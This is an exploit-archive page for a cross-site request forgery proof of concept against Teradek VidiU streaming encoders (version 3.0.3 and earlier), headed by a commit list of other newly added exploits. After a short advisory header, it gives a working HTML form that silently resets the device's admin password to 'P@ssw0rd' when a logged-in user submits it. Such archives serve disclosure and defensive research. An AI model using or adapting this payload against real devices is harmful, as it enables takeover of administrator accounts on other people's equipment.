08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
53 lines
No EOL
1.6 KiB
HTML
53 lines
No EOL
1.6 KiB
HTML
<!--
|
|
|
|
Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
|
|
|
|
|
|
Vendor: Teradek, LLC
|
|
Product web page: https://www.teradek.com
|
|
Affected version: VidiU, VidiU Mini, VidiU Pro
|
|
3.0.3 (build 32136)
|
|
3.0.2 (build 31225)
|
|
2.4.10
|
|
|
|
Summary: The Teradek VidiU gives you the freedom to broadcast live
|
|
high definition video directly to the Web without a PC. Whether you're
|
|
streaming out of a video switcher or wirelessly from your camera,
|
|
VidiU allows you to go live when you want, where you want. VidiU
|
|
offers API level integration with the Ustream, YouTube Live and
|
|
Livestream platforms, which makes streaming to your channel as
|
|
easy as logging into your account.
|
|
|
|
Desc: The application interface allows users to perform certain
|
|
actions via HTTP requests without performing any validity checks
|
|
to verify the requests. This can be exploited to perform certain
|
|
actions with administrative privileges if a logged-in user visits
|
|
a malicious web site.
|
|
|
|
Tested on: lighttpd/1.4.48
|
|
lighttpd/1.4.31
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5460
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
|
|
|
|
|
|
02.03.2018
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
|
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="submit" value="Initiate" />
|
|
</form>
|
|
</body>
|
|
</html> |